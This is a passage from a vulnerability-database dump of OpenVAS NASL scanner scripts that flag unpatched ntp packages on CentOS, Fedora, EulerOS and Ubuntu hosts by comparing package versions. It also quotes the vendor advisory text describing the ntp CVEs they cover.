Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882654\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:45:09 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ntp CESA-2017:0252 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ntp\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used to\nsynchronize a computer's time with another referenced time source.\nThese packages include the ntpd service which continuously adjusts system time\nand utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0252\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022266.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-perl\", rpm:\"ntp-perl~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171024", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1024)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1024\");\n script_version(\"2020-01-23T10:44:25+0000\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:44:25 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:44:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1024)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1024\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1024\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2017-1024 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\nA flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\nA flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\nA flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\nA flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872098", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-e8a8561ee7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-e8a8561ee7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872098\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:36:56 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-e8a8561ee7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e8a8561ee7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PABKEYX6ABBFJZGMXKH57X756EJUDS3C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "Check the version of ntp", "modified": "2019-03-08T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310882653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882653", "type": "openvas", "title": "CentOS Update for ntp CESA-2017:0252 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ntp CESA-2017:0252 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882653\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:45:01 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ntp CESA-2017:0252 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ntp\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used\nto synchronize a computer's time with another referenced time source.\nThese packages include the ntpd service which continuously adjusts system time\nand utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0252\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022267.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-perl\", rpm:\"ntp-perl~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872099", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-c198d15316", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-c198d15316\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872099\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:01 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-c198d15316\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c198d15316\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ILMSYVQMMF37MANYEO7KBHOPSC74EKGN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-07-14T00:00:00", "id": "OPENVAS:1361412562310843238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843238", "type": "openvas", "title": "Ubuntu Update for ntp USN-3349-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3349_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for ntp USN-3349-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843238\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-14 15:54:52 +0530 (Fri, 14 Jul 2017)\");\n script_cve_id(\"CVE-2016-2519\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\",\n \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9042\",\n \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2017-6458\", \"CVE-2017-6460\", \"CVE-2017-6462\",\n \"CVE-2017-6463\", \"CVE-2017-6464\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ntp USN-3349-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yihan Lian discovered that NTP incorrectly\n handled certain large request data values. A remote attacker could possibly use\n this issue to cause NTP to crash, resulting in a denial of service. This issue\n only affected Ubuntu 16.04 LTS. (CVE-2016-2519) Miroslav Lichvar discovered that\n NTP incorrectly handled certain spoofed addresses when performing rate limiting.\n A remote attacker could possibly use this issue to perform a denial of service.\n This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10.\n (CVE-2016-7426) Matthew Van Gundy discovered that NTP incorrectly handled\n certain crafted broadcast mode packets. A remote attacker could possibly use\n this issue to perform a denial of service. This issue only affected Ubuntu 14.04\n LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428) Miroslav\n Lichvar discovered that NTP incorrectly handled certain responses. A remote\n attacker could possibly use this issue to perform a denial of service. This\n issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10.\n (CVE-2016-7429) Sharon Goldberg and Aanchal Malhotra discovered that NTP\n incorrectly handled origin timestamps of zero. A remote attacker could possibly\n use this issue to bypass the origin timestamp protection mechanism. This issue\n only affected Ubuntu 16.10. (CVE-2016-7431) Brian Utterback, Sharon Goldberg and\n Aanchal Malhotra discovered that NTP incorrectly performed initial sync\n calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10.\n (CVE-2016-7433) Magnus Stubman discovered that NTP incorrectly handled certain\n mrulist queries. A remote attacker could possibly use this issue to cause NTP to\n crash, resulting in a denial of service. This issue only affected Ubuntu 16.04\n LTS and Ubuntu 16.10. (CVE-2016-7434) Matthew Van Gund discovered that NTP\n incorrectly handled origin timestamp checks. A remote attacker could possibly\n use this issue to perform a denial of service. This issue only affected Ubuntu\n Ubuntu 16.10, and Ubuntu 17.04. (CVE-2016-9042) Matthew Van Gundy discovered\n that NTP incorrectly handled certain control mode packets. A remote attacker\n could use this issue to set or unset traps. This issue only applied to Ubuntu\n 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9310) Matthew Van Gundy\n discovered that NTP incorrectly handled the trap service. A remote attacker\n could possibly use this issue to cause NTP to crash, resulting in a denial of\n service. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and\n Ubuntu 16.10. (CVE-2016-9311) It was di ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"ntp on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3349-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3349-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p9+dfsg-2ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p8+dfsg-1ubuntu2.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p4+dfsg-3ubuntu5.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2015-7973", "CVE-2015-8158", "CVE-2015-7979", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7431"], "description": "Junos OS is prone to multiple vulnerabilities in NTP.", "modified": "2018-10-26T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310106754", "href": 